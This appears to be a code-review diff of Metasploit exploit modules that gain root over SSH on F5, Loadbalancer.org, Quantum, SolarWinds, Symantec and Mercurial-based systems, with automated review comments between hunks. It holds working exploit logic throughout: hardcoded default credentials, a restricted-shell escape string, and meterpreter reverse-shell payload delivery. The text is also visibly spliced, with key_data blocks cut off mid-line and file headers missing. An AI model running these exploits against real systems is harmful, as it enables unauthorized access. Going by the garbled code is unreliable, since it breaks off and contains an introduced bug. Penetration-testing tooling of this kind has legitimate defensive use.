@@ -108,25 +116,19 @@ class MetasploitModule < Msf::Exploit::Remote # negatives due to weirdness with ssh sockets. We already know it's a shell # because auth succeeded by this point, so no need to do the check anyway. module TrustMeItsAShell - def _check_shell(*args) + def _check_shell(*_args) true end end def exploit payload_instance.extend(TrustMeItsAShell) - factory = ssh_socket_factory - ssh_options = { - :auth_methods => ['publickey'], - :config => false, - :use_agent => false, - :key_data => [ key_data ], - :port => rport, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } + ssh_options = ssh_client_defaults.merge({ + auth_methods: ['publickey'], + key_data: [ key_data ], + port: rport + }) ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG'] conn = do_login(ssh_options) @@ -140,28 +142,28 @@ class MetasploitModule < Msf::Exploit::Remote end end - def is_success?(conn,key_based) + def success?(conn, key_based) if conn - print_good "Successful login" + print_good 'Successful login' service_data = { address: rhost, port: rport, protocol: 'tcp', service_name: 'ssh', - workspace_id: myworkspace_id, + workspace_id: myworkspace_id } credential_data = { username: 'root', - private_type: ( key_based ? :ssh_key : :password ), - private_data: ( key_based ? key_data : 'inflection' ), + private_type: (key_based ? :ssh_key : :password), + private_data: (key_based ? key_data : 'inflection'), origin_type: :service, - module_fullname: fullname, + module_fullname: fullname }.merge(service_data) core = create_credential(credential_data) login_data = { core: core, - last_attempted: Time.now, + last_attempted: Time.now }.merge(service_data) create_credential_login(login_data) 
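Review bot: `is_success?` is renamed to `success?` in the second hunk, but the lines between the two hunks (old 133–139, right after `conn = do_login(ssh_options)`) are unchanged, and that is where the call sites must sit; unless they were already named `success?`, `exploit` now raises NoMethodError immediately after login. Please include the updated call sites (e.g. `if success?(conn, true)`), or keep a compatibility alias `alias is_success? success?` next to the new definition. The `exploit` method ends outside the first hunk.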
@@ -174,22 +176,22 @@ class MetasploitModule < Msf::Exploit::Remote end def key_data - < 'F5 BIG-IP SSH Private Key Exposure', - 'Description' => %q( + 'Name' => 'F5 BIG-IP SSH Private Key Exposure', + 'Description' => %q{ F5 ships a public/private key pair on BIG-IP appliances that allows passwordless authentication to any other BIG-IP box. Since the key is easily retrievable, an attacker can use it to gain unauthorized remote access as root. - ), - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Privileged' => true, - 'Targets' => [ [ "Universal", {} ] ], - 'Payload' => - { - 'Compat' => { - 'PayloadType' => 'cmd_interact', - 'ConnectionType' => 'find' - } - }, - 'Author' => ['egypt'], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'URL', 'https://www.trustmatta.com/advisories/MATTA-2012-002.txt' ], - [ 'CVE', '2012-1493' ], - [ 'OSVDB', '82780' ], - [ 'URL', 'https://www.rapid7.com/blog/post/2012/06/25/press-f5-for-root-shell' ] - ], + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Targets' => [ [ 'Universal', {} ] ], + 'Payload' => { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find' + } + }, + 'Author' => ['egypt'], + 'License' => MSF_LICENSE, + 'References' => [ + [ 'URL', 'https://www.trustmatta.com/advisories/MATTA-2012-002.txt' ], + [ 'CVE', '2012-1493' ], + [ 'OSVDB', '82780' ], + [ 'URL', 'https://www.rapid7.com/blog/post/2012/06/25/press-f5-for-root-shell' ] + ], 'DisclosureDate' => '2012-06-11', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, - 'DefaultTarget' => 0 + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } ) ) 
@@ -75,18 +79,12 @@ class MetasploitModule < Msf::Exploit::Remote end def do_login(user) - factory = Rex::Socket::SSHFactory.new(framework, self, datastore['Proxies']) + opt_hash = ssh_client_defaults.merge({ + auth_methods: ['publickey'], + port: rport, + key_data: [ key_data ] + }) - opt_hash = { - :auth_methods => ['publickey'], - :port => rport, - :key_data => [ key_data ], - :use_agent => false, - :config => false, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } opt_hash[:verbose] = :debug if datastore['SSH_DEBUG'] begin @@ -118,30 +116,30 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - conn = do_login("root") + conn = do_login('root') if conn - print_good "Successful login" + print_good 'Successful login' handler(conn.lsock) end end def key_data - < true, 'DefaultTarget' => 0, - 'DisclosureDate' => '2020-04-21' + 'DisclosureDate' => '2020-04-21', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } ) ) @@ -83,17 +88,11 @@ class MetasploitModule < Msf::Exploit::Remote end def do_login(user, pass) - factory = ssh_socket_factory - opts = { + opts = ssh_client_defaults.merge({ auth_methods: ['password', 'keyboard-interactive'], port: rport, - use_agent: false, - config: false, - password: pass, - proxy: factory, - non_interactive: true, - verify_host_key: :never - } + password: pass + }) opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] diff --git a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb index 45b80a3465..750e4cb387 100644 --- a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb +++ b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb 
@@ -13,35 +13,43 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::SSH def initialize(info = {}) - super(update_info(info, { - 'Name' => 'Loadbalancer.org Enterprise VA SSH Private Key Exposure', - 'Description' => %q{ - Loadbalancer.org ships a public/private key pair on Enterprise virtual appliances - version 7.5.2 that allows passwordless authentication to any other LB Enterprise box. - Since the key is easily retrievable, an attacker can use it to gain unauthorized remote - access as root. - }, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Privileged' => true, - 'Targets' => [ [ "Universal", {} ] ], - 'Payload' => + super( + update_info( + info, { - 'Compat' => { - 'PayloadType' => 'cmd_interact', - 'ConnectionType' => 'find', + 'Name' => 'Loadbalancer.org Enterprise VA SSH Private Key Exposure', + 'Description' => %q{ + Loadbalancer.org ships a public/private key pair on Enterprise virtual appliances + version 7.5.2 that allows passwordless authentication to any other LB Enterprise box. + Since the key is easily retrievable, an attacker can use it to gain unauthorized remote + access as root. 
}, - }, - 'Author' => 'xistence ', # Discovery, Metasploit module - 'License' => MSF_LICENSE, - 'References' => - [ - ['PACKETSTORM', '125754'] - ], - 'DisclosureDate' => '2014-03-17', - 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, - 'DefaultTarget' => 0 - })) + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Targets' => [ [ 'Universal', {} ] ], + 'Payload' => { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find' + } + }, + 'Author' => 'xistence ', # Discovery, Metasploit module + 'License' => MSF_LICENSE, + 'References' => [ + ['PACKETSTORM', '125754'] + ], + 'DisclosureDate' => '2014-03-17', + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } + } + ) + ) register_options( [ @@ -57,30 +65,25 @@ class MetasploitModule < Msf::Exploit::Remote OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) ] ) - end # helper methods that normally come from Tcp def rhost datastore['RHOST'] end + def rport datastore['RPORT'] end def do_login(user) - factory = ssh_socket_factory - opt_hash = { - :auth_methods => ['publickey'], - :port => rport, - :key_data => [ key_data ], - :use_agent => false, - :config => false, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } - opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + opt_hash = ssh_client_defaults.merge({ + auth_methods: ['publickey'], + port: rport, + key_data: [ key_data ] + }) + + opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh_socket = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do @@ -115,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - conn = do_login("root") + conn = do_login('root') if conn print_good "#{rhost}:#{rport} - Successful login" handler(conn.lsock) 
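Review bot: The `rhost`/`rport` overrides under `# helper methods that normally come from Tcp` are kept in this hunk, while the same commit deletes identical helpers from quantum_vmpro_backdoor.rb and symantec_smg_ssh.rb. If Msf::Exploit::Remote::SSH already supplies these accessors, the copies here (and the matching ones in quantum_dxi_known_privkey.rb and vmware_vdp_known_privkey.rb) can go too for consistency; if it does not, the two deletions are the ones that need a second look. The body of `do_login` continues past the end of this hunk.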
@@ -123,21 +126,19 @@ class MetasploitModule < Msf::Exploit::Remote end def key_data - < "Mercurial Custom hg-ssh Wrapper Remote Code Exec", - 'Description' => %q{ - This module takes advantage of custom hg-ssh wrapper implementations that don't - adequately validate parameters passed to the hg binary, allowing users to trigger a - Python Debugger session, which allows arbitrary Python code execution. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Mercurial Custom hg-ssh Wrapper Remote Code Exec', + 'Description' => %q{ + This module takes advantage of custom hg-ssh wrapper implementations that don't + adequately validate parameters passed to the hg binary, allowing users to trigger a + Python Debugger session, which allows arbitrary Python code execution. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'claudijd', ], - 'References' => - [ + 'References' => [ [ 'CVE', '2017-9462' ], - ['URL', 'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29'] + ['URL', 'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29'] ], - 'DefaultOptions' => - { - 'Payload' => 'python/meterpreter/reverse_tcp', + 'DefaultOptions' => { + 'Payload' => 'python/meterpreter/reverse_tcp' }, - 'Platform' => ['python'], - 'Arch' => ARCH_PYTHON, - 'Targets' => [ ['Automatic', {}] ], - 'Privileged' => false, - 'DisclosureDate' => '2017-04-18', - 'DefaultTarget' => 0 - )) + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'Targets' => [ ['Automatic', {}] ], + 'Privileged' => false, + 'DisclosureDate' => '2017-04-18', + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } + ) + ) register_options( [ 
@@ -72,19 +77,13 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - factory = ssh_socket_factory - ssh_options = { - :auth_methods => ['publickey'], - :config => false, - :use_agent => false, - :key_data => [ ssh_priv_key ], - :port => rport, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } + ssh_options = ssh_client_defaults.merge({ + auth_methods: ['publickey'], + key_data: [ ssh_priv_key ], + port: rport + }) - ssh_options.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG'] print_status("#{rhost}:#{rport} - Attempting to login...") @@ -107,12 +106,12 @@ class MetasploitModule < Msf::Exploit::Remote print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" return end - + # rubocop:disable Lint/ShadowingOuterLocalVariable if ssh - print_good("SSH connection is established.") + print_good('SSH connection is established.') ssh.open_channel do |ch| - ch.exec "hg -R --debugger serve --stdio" do |ch, success| - ch.on_extended_data do |ch, type, data| + ch.exec 'hg -R --debugger serve --stdio' do |ch, _success| + ch.on_extended_data do |ch, _type, data| if data.match(/entering debugger/) print_good("Triggered Debugger (#{data})") ch.send_data "#{payload.encoded}\n" @@ -122,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote end end end - + # rubocop:enable Lint/ShadowingOuterLocalVariable begin ssh.loop unless session_created? rescue Errno::EBADF => e diff --git a/modules/exploits/linux/ssh/microfocus_obr_shrboadmin.rb b/modules/exploits/linux/ssh/microfocus_obr_shrboadmin.rb index f304362fb2..85c7a868e4 100644 --- a/modules/exploits/linux/ssh/microfocus_obr_shrboadmin.rb +++ b/modules/exploits/linux/ssh/microfocus_obr_shrboadmin.rb 
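Review bot: The `# rubocop:disable Lint/ShadowingOuterLocalVariable` / `enable` pair silences the cop rather than fixing what it reports: the inner block parameters `|ch, _success|` and `|ch, _type, data|` shadow the `ch` bound by `ssh.open_channel do |ch|`. Renaming the inner parameters, e.g. `ch.exec 'hg -R --debugger serve --stdio' do |exec_ch, _success|` and `exec_ch.on_extended_data do |data_ch, _type, data|` with the inner `ch.send_data` call updated to `data_ch.send_data`, removes the need for the disable comments. `data.match(/entering debugger/)` can also become `data.match?(/entering debugger/)` since the MatchData is never used. The enclosing `exploit` method starts before this hunk and ends after it.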
@@ -50,7 +50,12 @@ class MetasploitModule < Msf::Exploit::Remote ], 'Privileged' => false, 'DefaultTarget' => 0, - 'DisclosureDate' => '2020-09-21' + 'DisclosureDate' => '2020-09-21', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } ) ) @@ -79,17 +84,11 @@ class MetasploitModule < Msf::Exploit::Remote end def do_login(user, pass) - factory = ssh_socket_factory - opts = { + opts = ssh_client_defaults.merge({ auth_methods: ['password', 'keyboard-interactive'], port: rport, - use_agent: false, - config: false, - password: pass, - proxy: factory, - non_interactive: true, - verify_host_key: :never - } + password: pass + }) opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] diff --git a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb index 0555e45f35..ce79add912 100644 --- a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb +++ b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb 
@@ -12,35 +12,43 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::SSH def initialize(info = {}) - super(update_info(info, { - 'Name' => 'Quantum DXi V1000 SSH Private Key Exposure', - 'Description' => %q{ - Quantum ships a public/private key pair on DXi V1000 2.2.1 appliances that - allows passwordless authentication to any other DXi box. Since the key is - easily retrievable, an attacker can use it to gain unauthorized remote - access as root. - }, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Privileged' => true, - 'Targets' => [ [ "Universal", {} ] ], - 'Payload' => + super( + update_info( + info, { - 'Compat' => { - 'PayloadType' => 'cmd_interact', - 'ConnectionType' => 'find', + 'Name' => 'Quantum DXi V1000 SSH Private Key Exposure', + 'Description' => %q{ + Quantum ships a public/private key pair on DXi V1000 2.2.1 appliances that + allows passwordless authentication to any other DXi box. Since the key is + easily retrievable, an attacker can use it to gain unauthorized remote + access as root. }, - }, - 'Author' => 'xistence ', # Discovery, Metasploit module - 'License' => MSF_LICENSE, - 'References' => - [ - ['PACKETSTORM', '125755'] - ], - 'DisclosureDate' => '2014-03-17', - 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, - 'DefaultTarget' => 0 - })) + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Targets' => [ [ 'Universal', {} ] ], + 'Payload' => { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find' + } + }, + 'Author' => 'xistence ', # Discovery, Metasploit module + 'License' => MSF_LICENSE, + 'References' => [ + ['PACKETSTORM', '125755'] + ], + 'DisclosureDate' => '2014-03-17', + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } + } + ) + ) register_options( [ 
@@ -56,30 +64,25 @@ class MetasploitModule < Msf::Exploit::Remote OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) ] ) - end # helper methods that normally come from Tcp def rhost datastore['RHOST'] end + def rport datastore['RPORT'] end def do_login(user) - factory = ssh_socket_factory - opt_hash = { - :auth_methods => ['publickey'], - :port => rport, - :key_data => [ key_data ], - :use_agent => false, - :config => false, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } - opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + opt_hash = ssh_client_defaults.merge({ + auth_methods: ['publickey'], + port: rport, + key_data: [ key_data ] + }) + + opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh_socket = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do @@ -114,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - conn = do_login("root") + conn = do_login('root') if conn print_good "#{rhost}:#{rport} - Successful login" handler(conn.lsock) 
@@ -122,21 +125,19 @@ class MetasploitModule < Msf::Exploit::Remote end def key_data - < "Quantum vmPRO Backdoor Command", - 'Description' => %q{ - This module abuses a backdoor command in Quantum vmPRO. Any user, even one without admin - privileges, can get access to the restricted SSH shell. By using the hidden backdoor - "shell-escape" command it's possible to drop to a real root bash shell. This module - has been tested successfully on Quantum vmPRO 3.1.2. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Quantum vmPRO Backdoor Command', + 'Description' => %q{ + This module abuses a backdoor command in Quantum vmPRO. Any user, even one without admin + privileges, can get access to the restricted SSH shell. By using the hidden backdoor + "shell-escape" command it's possible to drop to a real root bash shell. This module + has been tested successfully on Quantum vmPRO 3.1.2. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'xistence ' # Original discovery and Metasploit module ], - 'References' => - [ + 'References' => [ ['PACKETSTORM', '125760'] ], - 'DefaultOptions' => - { + 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, - 'Payload' => - { + 'Payload' => { 'Compat' => { - 'PayloadType' => 'cmd_interact', + 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find' } }, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Targets' => - [ + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [ ['Quantum vmPRO 3.1.2', {}], ], - 'Privileged' => true, - 'DisclosureDate' => '2014-03-17', - 'DefaultTarget' => 0)) + 'Privileged' => true, + 'DisclosureDate' => '2014-03-17', + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } + ) + ) register_options( [ 
@@ -67,31 +71,22 @@ class MetasploitModule < Msf::Exploit::Remote ) end - def rhost datastore['RHOST'] end - def rport datastore['RPORT'] end - def do_login(user, pass) - factory = ssh_socket_factory - opts = { - :auth_methods => ['password', 'keyboard-interactive'], - :port => rport, - :use_agent => false, - :config => true, - :password => pass, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } + opts = ssh_client_defaults.merge({ + auth_methods: ['password', 'keyboard-interactive'], + port: rport, + password: pass + }) - opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh = nil @@ -122,7 +117,6 @@ class MetasploitModule < Msf::Exploit::Remote return nil end - def exploit user = datastore['USER'] pass = datastore['PASS'] diff --git a/modules/exploits/linux/ssh/solarwinds_lem_exec.rb b/modules/exploits/linux/ssh/solarwinds_lem_exec.rb index 7538a8b073..8ed30612fc 100644 --- a/modules/exploits/linux/ssh/solarwinds_lem_exec.rb +++ b/modules/exploits/linux/ssh/solarwinds_lem_exec.rb 
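Review bot: The `do_login` rewrite drops `config: true`, which the removed hash set explicitly, in favour of whatever `ssh_client_defaults` supplies; every other module converted in this commit previously had `config: false`, so this module presumably now stops reading the local SSH client configuration, a behaviour change the commit does not mention. If the shared default is `config: false`, either re-add `config: true` inside the merged hash here or state in the commit message that dropping it is intended. The same silent flip occurs in `do_login` of schneider_electric_net55xx_encoder.rb and in the key-based options hash of array_vxag_vapv_privkey_privesc.rb. The rest of `do_login` lies outside this hunk.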
@@ -8,37 +8,37 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::SSH - def initialize(info={}) - super(update_info(info, - 'Name' => "SolarWinds LEM Default SSH Password Remote Code Execution", - 'Description' => %q{ - This module exploits the default credentials of SolarWinds LEM. A menu system is encountered when the SSH - service is accessed with the default username and password which is "cmc" and "password". By exploiting a - vulnerability that exist on the menuing script, an attacker can escape from restricted shell. + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'SolarWinds LEM Default SSH Password Remote Code Execution', + 'Description' => %q{ + This module exploits the default credentials of SolarWinds LEM. A menu system is encountered when the SSH + service is accessed with the default username and password which is "cmc" and "password". By exploiting a + vulnerability that exist on the menuing script, an attacker can escape from restricted shell. - This module was tested against SolarWinds LEM v6.3.1. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ + This module was tested against SolarWinds LEM v6.3.1. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Mehmet Ince ', # discovery & msf module ], - 'References' => - [ + 'References' => [ ['CVE', '2017-7722'], ['URL', 'http://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/'] ], - 'DefaultOptions' => - { - 'Payload' => 'python/meterpreter/reverse_tcp', + 'DefaultOptions' => { + 'Payload' => 'python/meterpreter/reverse_tcp' }, - 'Platform' => ['python'], - 'Arch' => ARCH_PYTHON, - 'Targets' => [ ['Automatic', {}] ], - 'Privileged' => false, - 'DisclosureDate' => '2017-03-17', - 'DefaultTarget' => 0 - )) + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'Targets' => [ ['Automatic', {}] ], + 'Privileged' => false, + 'DisclosureDate' => '2017-03-17', + 'DefaultTarget' => 0 + ) + ) register_options( [ @@ -73,19 +73,13 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - factory = ssh_socket_factory - opts = { - :auth_methods => ['keyboard-interactive'], - :port => rport, - :use_agent => false, - :config => false, - :password => password, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } + opts = ssh_client_defaults.merge({ + auth_methods: ['keyboard-interactive'], + port: rport, + password: password + }) - opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] print_status("#{rhost}:#{rport} - Attempting to login...") 
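Review bot: The reformatted `initialize` metadata in solarwinds_lem_exec.rb ends at `'DefaultTarget' => 0` without the `'Notes'` block that this same commit adds to the other modules it touches. Adding an entry of the form `'Notes' => { 'Stability' => [...], 'Reliability' => [...], 'SideEffects' => [...] }` with values chosen for this module keeps the set consistent. The same omission applies to symantec_smg_ssh.rb, vmware_vdp_known_privkey.rb, schneider_electric_net55xx_encoder.rb and array_vxag_vapv_privkey_privesc.rb.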
@@ -111,52 +105,51 @@ class MetasploitModule < Msf::Exploit::Remote if ssh payload_executed = false - print_good("SSH connection is established.") + print_good('SSH connection is established.') ssh.open_channel do |channel| - print_status("Requesting pty... We need it in order to interact with menuing system.") + print_status('Requesting pty... We need it in order to interact with menuing system.') channel.request_pty do |ch, success| - raise ::RuntimeError, "Could not request pty!" unless success - print_good("Pty successfully obtained.") + raise 'Could not request pty!' unless success - print_status("Requesting a shell.") - ch.send_channel_request("shell") do |ch, success| - raise ::RuntimeError, "Could not open shell!" unless success - print_good("Remote shell successfully obtained.") + print_good('Pty successfully obtained.') + + print_status('Requesting a shell.') + ch.send_channel_request('shell') do |_ch, success| + raise 'Could not open shell!' unless success + + print_good('Remote shell successfully obtained.') end end - channel.on_data do |ch, data| - if data.include? "cmc " - print_good("Step 1 is done. Managed to access terminal menu.") + channel.on_data do |_ch, data| + if data.include? 'cmc ' + print_good('Step 1 is done. Managed to access terminal menu.') channel.send_data("service\n") end - if data.include? "service " + if data.include? 'service ' print_good("Step 2 is done. Managed to select 'service' sub menu.") channel.send_data("restrictssh\n") end - if data.include? "Press to configure restriction on the SSH service to the Manager Appliance" + if data.include? 'Press to configure restriction on the SSH service to the Manager Appliance' print_good("Step 3 is done. Managed to start 'restrictssh' function.") channel.send_data("*#`bash>&2`\n") end - if data.include? "Are the hosts" - print_good("Step 4 is done. We are going to try escape from jail shell.") + if data.include? 'Are the hosts' + print_good('Step 4 is done. 
We are going to try escape from jail shell.') channel.send_data("Y\n") end - if data.include? "/usr/local/contego" - if payload_executed == false - print_good("Sweet..! Escaped from jail.") - print_status("Delivering payload...") - channel.send_data("python -c \"#{payload.encoded}\"\n") - payload_executed = true - end + if data.include? '/usr/local/contego' && (payload_executed == false) + print_good('Sweet..! Escaped from jail.') + print_status('Delivering payload...') + channel.send_data("python -c \"#{payload.encoded}\"\n") + payload_executed = true end - end end begin diff --git a/modules/exploits/linux/ssh/symantec_smg_ssh.rb b/modules/exploits/linux/ssh/symantec_smg_ssh.rb index 471e5e6a96..989fde73de 100644 --- a/modules/exploits/linux/ssh/symantec_smg_ssh.rb +++ b/modules/exploits/linux/ssh/symantec_smg_ssh.rb 
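Review bot: `if data.include? '/usr/local/contego' && (payload_executed == false)` in the `channel.on_data` block is parsed as `data.include?('/usr/local/contego' && (payload_executed == false))`, so `String#include?` receives `true` or `false` and raises TypeError on the first callback, whereas the removed nested `if` tested the string. Write it as `if data.include?('/usr/local/contego') && !payload_executed`, which also drops the `== false` comparison. The enclosing `exploit` method starts before this hunk.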
@@ -11,50 +11,49 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::SSH - def initialize(info={}) - super(update_info(info, - 'Name' => "Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability", - 'Description' => %q{ - This module exploits a default misconfiguration flaw on Symantec Messaging Gateway. - The 'support' user has a known default password, which can be used to login to the - SSH service, and gain privileged access from remote. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'Stefan Viehbock', #Original discovery - 'Ben Williams', #Reporting the vuln + coordinated release - 'sinn3r' #Metasploit + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability', + 'Description' => %q{ + This module exploits a default misconfiguration flaw on Symantec Messaging Gateway. + The 'support' user has a known default password, which can be used to login to the + SSH service, and gain privileged access from remote. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Stefan Viehbock', # Original discovery + 'Ben Williams', # Reporting the vuln + coordinated release + 'sinn3r' # Metasploit ], - 'References' => - [ - ['CVE', '2012-3579'], + 'References' => [ + ['CVE', '2012-3579'], ['OSVDB', '85028'], - ['BID', '55143'], - ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00'] + ['BID', '55143'], + ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00'] ], - 'DefaultOptions' => - { + 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, - 'Payload' => - { + 'Payload' => { 'Compat' => { - 'PayloadType' => 'cmd_interact', + 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find' } }, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Targets' => - [ + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [ ['Symantec Messaging Gateway 9.5', {}], ], - 'Privileged' => true, - #Timestamp on Symantec advisory - #But was found on Jun 26, 2012 - 'DisclosureDate' => '2012-08-27', - 'DefaultTarget' => 0)) + 'Privileged' => true, + # Timestamp on Symantec advisory + # But was found on Jun 26, 2012 + 'DisclosureDate' => '2012-08-27', + 'DefaultTarget' => 0 + ) + ) register_options( [ 
@@ -71,31 +70,22 @@ class MetasploitModule < Msf::Exploit::Remote ) end - def rhost datastore['RHOST'] end - def rport datastore['RPORT'] end - def do_login(user, pass) - factory = ssh_socket_factory - opts = { - :auth_methods => ['password', 'keyboard-interactive'], - :port => rport, - :use_agent => false, - :config => false, - :password => pass, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } + opts = ssh_client_defaults.merge({ + auth_methods: ['password', 'keyboard-interactive'], + port: rport, + password: pass + }) - opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh = nil @@ -126,7 +116,6 @@ class MetasploitModule < Msf::Exploit::Remote return nil end - def exploit user = 'support' pass = 'symantec' diff --git a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb index 5c1fb86699..8062d15a5b 100644 --- a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb +++ b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb 
@@ -13,33 +13,36 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Auxiliary::Report def initialize(info = {}) - super(update_info(info, { - 'Name' => 'VMware VDP Known SSH Key', - 'Description' => %q{ - VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password. - }, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Privileged' => true, - 'Targets' => [ [ "Universal", {} ] ], - 'Payload' => + super( + update_info( + info, { - 'Compat' => { - 'PayloadType' => 'cmd_interact', - 'ConnectionType' => 'find', + 'Name' => 'VMware VDP Known SSH Key', + 'Description' => %q{ + VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password. }, - }, - 'Author' => ['phroxvs'], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'CVE', '2016-7456' ], - [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ], - ], - 'DisclosureDate' => '2016-12-20', - 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, - 